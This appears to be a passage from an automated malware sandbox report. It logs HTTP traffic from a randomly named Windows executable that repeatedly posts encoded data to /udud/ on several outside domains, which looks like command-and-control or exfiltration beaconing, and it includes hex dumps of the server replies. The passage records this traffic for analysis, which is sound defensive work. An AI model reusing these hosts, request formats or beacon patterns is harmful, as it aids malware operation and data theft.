                                                                                                Data Raw: 34 33 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 55 5b 6f e3 44 14 7e 4e 7e c5 e0 55 b5 2d c4 b5 93 26 bd b8 4e a4 34 97 dd 90 6d ba 6d 93 2c 29 e2 61 62 4f ec 51 6d 8f 19 8f 73 29 5a 69 c5 03 e2 85 07 de 90 b8 48 f0 c4 0b 12 2f 2b ad 40 fc 1a 5a 01 ff 82 b9 38 ad b7 2a 08 9c f8 32 67 ce 9c f3 9d 73 be 39 63 bf d3 3e 69 0d 27 cf 3b e0 e9 f0 f8 19 78 3e 3a 7a d6 6b 01 4d 37 8c 17 3b 2d c3 68 0f db 6a a2 ba 6d 96 c1 90 c2 28 c1 0c 93 08 06 86 d1 19 68 8d a2 ed b3 30 10 2f 04 dd 46 b1 60 87 88 41 e0 33 16 eb e8 e3 14 cf eb 5a 8b 44 0c 45 4c 1f ae 62 a4 01 47 8d ea 1a 43 4b 66 88 b5 87 c0 f1 21 4d 10 ab 8f 86 5d 7d 5f 03 46 a3 08 f8 65 33 cc 02 d4 a8 9a 55 fd 8f df be bc f9 f6 d5 f5 9b 2f 6e 7e fa ea e6 9b 1f 6d 43 4d 15 0b 6b 7f 11 0c 51 5d a3 64 4a 58 92 f3 11 91 19 09 02 b2 e0 30 1f 00 16 53 e8 85 f0 2d 75 dd 81 8e 8f 1e 56 97 53 ba c0 4f 49 f0 9f 57 a1 65 8c 29 ca 83 32 1f 36 7f 89 56 0b 42 dd bc 66 26 2a 97 b2 8f ca fa 63 e7 61 13 2e 4a 1c 8a 63 51 9e 1c be a1 8f 13 c0 ff e1 0a c4 d0 93 c1 f1 6c 24 [TRUNCATED]
                                                                                                Data Ascii: 43eU[oD~N~U-&N4mm,)abOQms)ZiH/+@Z8*2gs9c>i';x>:zkM7;-hjm(h0/F`A3ZDELbGCKf!M]}_Fe3U/n~mCMkQ]dJX0S-uVSOIWe)26VBf&*ca.JcQl$l[,?!,Pb8%Lj3>!VxL]LEKIi 0(sK DLZB$\+pqNav%<>:9['ikp>;#O|qWkpw N9NIsqNv]ELpq>Nv9[':LhrMO"YzqN\(3Gn'gZkE1^6JY,|&Y/9$RB]=PE(N293w@p@)j%p0$r[fn:YbWQfN1K\/'Y4dJ")%3A)K@!V8<q[`f[I HUd(K5MK*2#Z(NX1QK&R+HH]PHR&,[7w2<ww3S4@FiQ'xBhX9tZnWVyt@"-J{5=P-j1p$un[FYXVgZc
                                                                                                May 27, 2024 12:34:25.217117071 CEST102INData Raw: 40 98 3d a5 46 a3 2b 68 97 e9 b9 78 be b6 26 6b a9 35 6c 83 cb 84 89 fc 94 3a 08 d7 5e c4 19 f7 d7 f7 af ff 7c fd f3 f5 9b 1f ae 7f f9 ec f7 57 9f 72 f7 d2 b6 cd cf 53 8a 66 75 cd d0 1a 37 5f 7f 77 f3 39 57 f9 95 eb da 06 14 36 95 6d db 50 c1 f0
                                                                                                Data Ascii: @=F+hx&k5l:^|WrSfu7_w9W6mPy70


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                46192.168.11.3049876147.92.36.247807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:34:27.725975990 CEST753OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.uhahiq.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.uhahiq.com
                                                                                                Referer: http://www.uhahiq.com/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 45 63 2b 56 78 46 37 36 63 6d 52 52 73 64 56 43 76 46 78 37 58 6e 4b 6f 34 52 69 63 4e 4f 66 41 64 51 65 58 2f 7a 6c 2f 64 39 4e 4d 6e 37 55 54 65 41 43 78 6a 67 55 72 2f 39 70 32 53 45 53 75 6e 54 37 4f 4b 38 47 62 39 2f 33 2f 33 37 55 5a 73 73 4a 39 66 6f 71 76 32 58 30 75 49 33 70 62 77 4a 71 43 42 54 68 79 54 47 65 56 54 4b 6d 45 58 62 2b 4e 6a 50 78 71 79 69 71 79 70 41 4e 5a 6f 6f 65 6f 7a 6d 4c 42 42 39 79 33 6f 58 75 67 33 67 2b 50 4d 59 33 4f 6c 67 57 6a 69 4b 71 47 71 59 4b 4a 70 45 65 64 30 65 41 50 31 62 46 38 6a 71 4f 65 76 6b 32 44 45 38 7a 52 6a 6b 75 41 71 36 30 53 64 68 75 5a 65 59 31 78 78 37 53 69 53 67 4d 49 2f 6b 55 3d
                                                                                                Data Ascii: Pl9P8ldX=Ec+VxF76cmRRsdVCvFx7XnKo4RicNOfAdQeX/zl/d9NMn7UTeACxjgUr/9p2SESunT7OK8Gb9/3/37UZssJ9foqv2X0uI3pbwJqCBThyTGeVTKmEXb+NjPxqyiqypANZooeozmLBB9y3oXug3g+PMY3OlgWjiKqGqYKJpEed0eAP1bF8jqOevk2DE8zRjkuAq60SdhuZeY1xx7SiSgMI/kU=
                                                                                                May 27, 2024 12:34:28.055875063 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: nginx/1.8.1
                                                                                                Date: Mon, 27 May 2024 10:34:27 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Set-Cookie: SESSION=d193f5cd-b6e8-4b38-931e-39689d1602da; Path=/; HttpOnly; SameSite=Lax
                                                                                                Content-Encoding: gzip
                                                                                                Data Raw: 34 33 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 55 5b 6f e3 44 14 7e 4e 7e c5 e0 55 b5 2d c4 b5 93 26 bd b8 4e a4 34 97 dd 90 6d ba 6d 93 2c 29 e2 61 62 4f ec 51 6d 8f 19 8f 73 29 5a 69 c5 03 e2 85 07 de 90 b8 48 f0 c4 0b 12 2f 2b ad 40 fc 1a 5a 01 ff 82 b9 38 ad b7 2a 08 9c f8 32 67 ce 9c f3 9d 73 be 39 63 bf d3 3e 69 0d 27 cf 3b e0 e9 f0 f8 19 78 3e 3a 7a d6 6b 01 4d 37 8c 17 3b 2d c3 68 0f db 6a a2 ba 6d 96 c1 90 c2 28 c1 0c 93 08 06 86 d1 19 68 8d a2 ed b3 30 10 2f 04 dd 46 b1 60 87 88 41 e0 33 16 eb e8 e3 14 cf eb 5a 8b 44 0c 45 4c 1f ae 62 a4 01 47 8d ea 1a 43 4b 66 88 b5 87 c0 f1 21 4d 10 ab 8f 86 5d 7d 5f 03 46 a3 08 f8 65 33 cc 02 d4 a8 9a 55 fd 8f df be bc f9 f6 d5 f5 9b 2f 6e 7e fa ea e6 9b 1f 6d 43 4d 15 0b 6b 7f 11 0c 51 5d a3 64 4a 58 92 f3 11 91 19 09 02 b2 e0 30 1f 00 16 53 e8 85 f0 2d 75 dd 81 8e 8f 1e 56 97 53 ba c0 4f 49 f0 9f 57 a1 65 8c 29 ca 83 32 1f 36 7f 89 56 0b 42 dd bc 66 26 2a 97 b2 8f ca fa 63 e7 61 13 2e 4a 1c 8a 63 51 9e 1c be a1 8f 13 c0 ff e1 0a c4 d0 93 c1 f1 6c 24 [TRUNCATED]
                                                                                                Data Ascii: 43eU[oD~N~U-&N4mm,)abOQms)ZiH/+@Z8*2gs9c>i';x>:zkM7;-hjm(h0/F`A3ZDELbGCKf!M]}_Fe3U/n~mCMkQ]dJX0S-uVSOIWe)26VBf&*ca.JcQl$l[,?!,Pb8%Lj3>!VxL]LEKIi 0(sK DLZB$\+pqNav%<>:9['ikp>;#O|qWkpw N9NIsqNv]ELpq>Nv9[':LhrMO"YzqN\(3Gn'gZkE1^6JY,|&Y/9$RB]=PE(N293w@p@)j%p0$r[fn:YbWQfN1K\/'Y4dJ")%3A)K@!V8<q[`f[I HUd(K5MK*2#Z(NX1QK&R+HH]PHR&,[7w2<ww3S4@FiQ'xBhX9tZnWVyt@"-J{5=P-j1p$un[FYXVgZc
                                                                                                May 27, 2024 12:34:28.055886030 CEST102INData Raw: 40 98 3d a5 46 a3 2b 68 97 e9 b9 78 be b6 26 6b a9 35 6c 83 cb 84 89 fc 94 3a 08 d7 5e c4 19 f7 d7 f7 af ff 7c fd f3 f5 9b 1f ae 7f f9 ec f7 57 9f 72 f7 d2 b6 cd cf 53 8a 66 75 cd d0 1a 37 5f 7f 77 f3 39 57 f9 95 eb da 06 14 36 95 6d db 50 c1 f0
                                                                                                Data Ascii: @=F+hx&k5l:^|WrSfu7_w9W6mPy70


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                47192.168.11.3049877147.92.36.247807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:34:30.575141907 CEST1670OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.uhahiq.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.uhahiq.com
                                                                                                Referer: http://www.uhahiq.com/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 45 63 2b 56 78 46 37 36 63 6d 52 52 73 64 56 43 76 46 78 37 58 6e 4b 6f 34 52 69 63 4e 4f 66 41 64 51 65 58 2f 7a 6c 2f 64 39 46 4d 6e 49 63 54 63 6e 57 78 78 77 55 72 7a 64 70 33 53 45 54 32 6e 54 6a 4b 4b 38 4b 6c 39 38 50 2f 31 59 63 5a 75 65 68 39 57 6f 71 76 2b 33 30 6a 48 58 70 30 77 49 47 4f 42 58 46 79 54 47 65 56 54 49 2b 45 55 4b 2b 4e 6c 50 78 70 69 53 71 31 74 41 4e 78 6f 6f 47 65 7a 6d 4f 36 42 4f 4b 33 70 30 57 67 36 79 6d 50 44 59 33 51 6b 67 57 37 69 4b 6d 5a 71 5a 6d 7a 70 41 66 34 30 66 30 50 31 66 63 34 33 37 57 6b 74 58 61 71 4d 2f 58 4b 76 55 32 4e 33 37 6f 78 62 79 43 45 49 72 4a 78 35 50 53 6d 57 6c 45 79 68 30 36 37 69 51 30 6f 36 32 58 5a 2f 78 72 45 62 45 57 47 77 31 6c 35 64 4c 5a 4b 64 56 41 4e 36 35 6e 42 79 46 6b 59 6b 4d 55 34 75 66 34 59 57 6c 42 38 47 59 49 43 66 51 62 66 77 35 36 58 31 75 42 31 78 7a 2f 32 32 78 62 55 41 2b 75 4a 75 66 4c 30 4b 32 35 77 77 43 49 47 57 6d 4b 54 73 31 4d 59 63 62 70 4f 6f 55 78 6f 4f 56 61 38 69 59 51 76 6a [TRUNCATED]
                                                                                                Data Ascii: Pl9P8ldX=Ec+VxF76cmRRsdVCvFx7XnKo4RicNOfAdQeX/zl/d9FMnIcTcnWxxwUrzdp3SET2nTjKK8Kl98P/1YcZueh9Woqv+30jHXp0wIGOBXFyTGeVTI+EUK+NlPxpiSq1tANxooGezmO6BOK3p0Wg6ymPDY3QkgW7iKmZqZmzpAf40f0P1fc437WktXaqM/XKvU2N37oxbyCEIrJx5PSmWlEyh067iQ0o62XZ/xrEbEWGw1l5dLZKdVAN65nByFkYkMU4uf4YWlB8GYICfQbfw56X1uB1xz/22xbUA+uJufL0K25wwCIGWmKTs1MYcbpOoUxoOVa8iYQvjVUFjsXCgsaHv1nBeyKTx0CRECCb0p64AL/qplGtFeHG4BTn+gQAJM3ljzNkD1kE7wWY8YNWOL8gYYTBRDjaBdqf7XuZa+svkas4wSgUYmP1NgSPbQQtO3+fY+fozArjuP30/qVgVmpvbc9+ZccCHUdf1q7/XzGOnfAnlURQ6eAoYBKwtqMOMdWh9DKNe026v7fbLsAkjnhR+IjC4GpnPshTBIw6keONyQPKZHEjF+c0M7ZiYftc9KklGvOmdD/o2qyu5ukLe78sj6NdwRRMxImEUFLsJE+Qp4XcYnJLPKriBQhRtpnVW0z6zdd3xJUQDeimkOk1UgJ0qy77oqolj6f+9Lpr4N680ucpS0bqVTmik6JAI6EVv4JaPDBWgpO7dkpJTqovNkizRZEBilS6Ctsxcdhd6qiDA95EbmZF6wLqMqI+bC7QsIWdegfOQcrOYtiap0oakUtLFRhm5+lOoIJvLrF64fLNSGtvJ+qHM/ssmfPzkkntVBM2mX1bWAoKvs5tKPDZacnkPXJmA+H4mWHuzdyj/COFei0LW16RZDRvggx+MmbL7T7QSNQZt2huGdAlWMDMjWltcpw+sgUTaYltN30c2IeSjlSGwPQ5aU9nNGQ1rta2PaJX9oxZDYNOI7HCayxH3TFbSoajdG8LO6EwvjVXVVgpMgT [TRUNCATED]
                                                                                                May 27, 2024 12:34:30.907864094 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: nginx/1.8.1
                                                                                                Date: Mon, 27 May 2024 10:34:30 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Set-Cookie: SESSION=7bd75baa-d7d4-4461-8ec9-608a5188c13f; Path=/; HttpOnly; SameSite=Lax
                                                                                                Content-Encoding: gzip
                                                                                                Data Raw: 34 33 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 55 5b 6f e3 44 14 7e 4e 7e c5 e0 55 b5 2d c4 b5 93 26 bd b8 4e a4 34 97 dd 90 6d ba 6d 93 2c 29 e2 61 62 4f ec 51 6d 8f 19 8f 73 29 5a 69 c5 03 e2 85 07 de 90 b8 48 f0 c4 0b 12 2f 2b ad 40 fc 1a 5a 01 ff 82 b9 38 ad b7 2a 08 9c f8 32 67 ce 9c f3 9d 73 be 39 63 bf d3 3e 69 0d 27 cf 3b e0 e9 f0 f8 19 78 3e 3a 7a d6 6b 01 4d 37 8c 17 3b 2d c3 68 0f db 6a a2 ba 6d 96 c1 90 c2 28 c1 0c 93 08 06 86 d1 19 68 8d a2 ed b3 30 10 2f 04 dd 46 b1 60 87 88 41 e0 33 16 eb e8 e3 14 cf eb 5a 8b 44 0c 45 4c 1f ae 62 a4 01 47 8d ea 1a 43 4b 66 88 b5 87 c0 f1 21 4d 10 ab 8f 86 5d 7d 5f 03 46 a3 08 f8 65 33 cc 02 d4 a8 9a 55 fd 8f df be bc f9 f6 d5 f5 9b 2f 6e 7e fa ea e6 9b 1f 6d 43 4d 15 0b 6b 7f 11 0c 51 5d a3 64 4a 58 92 f3 11 91 19 09 02 b2 e0 30 1f 00 16 53 e8 85 f0 2d 75 dd 81 8e 8f 1e 56 97 53 ba c0 4f 49 f0 9f 57 a1 65 8c 29 ca 83 32 1f 36 7f 89 56 0b 42 dd bc 66 26 2a 97 b2 8f ca fa 63 e7 61 13 2e 4a 1c 8a 63 51 9e 1c be a1 8f 13 c0 ff e1 0a c4 d0 93 c1 f1 6c 24 [TRUNCATED]
                                                                                                Data Ascii: 43eU[oD~N~U-&N4mm,)abOQms)ZiH/+@Z8*2gs9c>i';x>:zkM7;-hjm(h0/F`A3ZDELbGCKf!M]}_Fe3U/n~mCMkQ]dJX0S-uVSOIWe)26VBf&*ca.JcQl$l[,?!,Pb8%Lj3>!VxL]LEKIi 0(sK DLZB$\+pqNav%<>:9['ikp>;#O|qWkpw N9NIsqNv]ELpq>Nv9[':LhrMO"YzqN\(3Gn'gZkE1^6JY,|&Y/9$RB]=PE(N293w@p@)j%p0$r[fn:YbWQfN1K\/'Y4dJ")%3A)K@!V8<q[`f[I HUd(K5MK*2#Z(NX1QK&R+HH]PHR&,[7w2<ww3S4@FiQ'xBhX9tZnWVyt@"-J{5=P-j1p$un[FYXVgZc
                                                                                                May 27, 2024 12:34:30.907887936 CEST102INData Raw: 40 98 3d a5 46 a3 2b 68 97 e9 b9 78 be b6 26 6b a9 35 6c 83 cb 84 89 fc 94 3a 08 d7 5e c4 19 f7 d7 f7 af ff 7c fd f3 f5 9b 1f ae 7f f9 ec f7 57 9f 72 f7 d2 b6 cd cf 53 8a 66 75 cd d0 1a 37 5f 7f 77 f3 39 57 f9 95 eb da 06 14 36 95 6d db 50 c1 f0
                                                                                                Data Ascii: @=F+hx&k5l:^|WrSfu7_w9W6mPy70


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                48192.168.11.3049878147.92.36.247807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:34:33.421188116 CEST475OUTGET /udud/?Pl9P8ldX=JeW1ywHbInp/iudCt0BoISDa+lnGE8/XYCCr+igFIIlNiJFqeEfQ/jwRjatbRGfuzAuKF9+1993CsJcrjcNhPJvZ+1kkeDtgpfW+DhUrRm2QAt+ZR6HWj8c=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.uhahiq.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:34:33.762996912 CEST1289INHTTP/1.1 404 Not Found
                                                                                                Server: nginx/1.8.1
                                                                                                Date: Mon, 27 May 2024 10:34:33 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 2007
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Set-Cookie: SESSION=58e2d53e-a227-484c-9753-173d8a6c657b; Path=/; HttpOnly; SameSite=Lax
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 2d e7 bd 91 e5 9d 80 e4 b8 8d e5 ad 98 e5 9c a8 3c 2f 74 69 74 6c 65 3e 0a 09 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 09 3c 6d 65 74 61 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>404-</title><meta name="robots" content="nofollow"><meta http-equiv="pragma" content="no-cache"><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="expires" content="0"><meta http-equiv="keywords" content="keyword1,keyword2,keyword3"><meta http-equiv="description" content="This is my page"><style>*{margin:0;padding:0;}body{font-family: 'Audiowide', cursive, arial, helvetica, sans-serif;background:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAoAAAAKCAYAAACNMs+9AAAAUElEQVQYV2NkYGAwBuKzQAwDID4IoIgxIikAMZE1oRiArBDdZBSNMIXoJiFbDZYDKcSmCOYimDuNSVKIzRNYrUYOFuQgweoZbIoxgoeoAAcAEckW11HVTfcAAAAASUVORK5CYII=) repeat;background-color:#212121;color:white;font-size: 18px;padding-bottom:20px;}.error-code{font-family: 'Creepster', cursive, arial, hel [TRUNCATED]
                                                                                                May 27, 2024 12:34:33.763082027 CEST981INData Raw: 65 72 69 66 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 30 70 78 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 39 38 29 3b 0a 09
                                                                                                Data Ascii: erif;font-size: 200px;color: white;color: rgba(255, 255, 255, 0.98);width: 50%;text-align: right;margin-top: 5%;text-shadow: 5px 5px hsl(0, 0%, 25%);float: left;}.not-found{width: 47%;float: right;


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                49192.168.11.3049879208.112.85.150807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:34:50.099581003 CEST481OUTGET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.fivetownsjcc.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:34:50.206923962 CEST383INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:34:30 GMT
                                                                                                Server: Apache
                                                                                                X-SERVER: 3908
                                                                                                Content-Length: 203
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 64 75 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                50192.168.11.304988079.98.25.1807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:34:55.443005085 CEST742OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.maxiwalls.com
                                                                                                Referer: http://www.maxiwalls.com/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 7a 35 48 41 4c 31 4c 56 4e 6b 42 6d 55 41 42 31 62 33 38 31 41 32 70 45 61 2b 6f 33 68 75 47 54 36 62 78 50 52 67 55 52 4d 66 71 55 66 76 4b 63 6c 69 69 4d 68 36 62 30 42 4c 59 35 4f 36 34 45 73 73 55 64 4b 6e 4e 50 46 66 42 77 72 45 41 64 6e 6d 75 55 6c 33 6c 6a 67 51 6e 35 46 37 43 48 37 52 64 31 70 44 64 49 2f 78 32 58 39 36 6b 57 43 78 4b 32 32 6f 32 46 74 65 32 48 66 4d 31 2b 47 6d 72 38 61 79 43 58 6f 49 7a 75 7a 6c 38 61 32 73 47 4d 72 51 74 49 30 71 69 74 73 6d 58 45 44 4a 65 75 31 44 5a 53 63 74 77 30 52 44 4f 76 4c 2b 51 43 37 6f 4f 33 47 4a 4f 4f 42 78 48 79 34 41 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=z5HAL1LVNkBmUAB1b381A2pEa+o3huGT6bxPRgURMfqUfvKcliiMh6b0BLY5O64EssUdKnNPFfBwrEAdnmuUl3ljgQn5F7CH7Rd1pDdI/x2X96kWCxK22o2Fte2HfM1+Gmr8ayCXoIzuzl8a2sGMrQtI0qitsmXEDJeu1DZSctw0RDOvL+QC7oO3GJOOBxHy4A==
                                                                                                May 27, 2024 12:34:55.657190084 CEST363INHTTP/1.1 403 Forbidden
                                                                                                Date: Mon, 27 May 2024 10:34:55 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 199
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                51192.168.11.304988179.98.25.1807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:34:58.190056086 CEST762OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.maxiwalls.com
                                                                                                Referer: http://www.maxiwalls.com/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
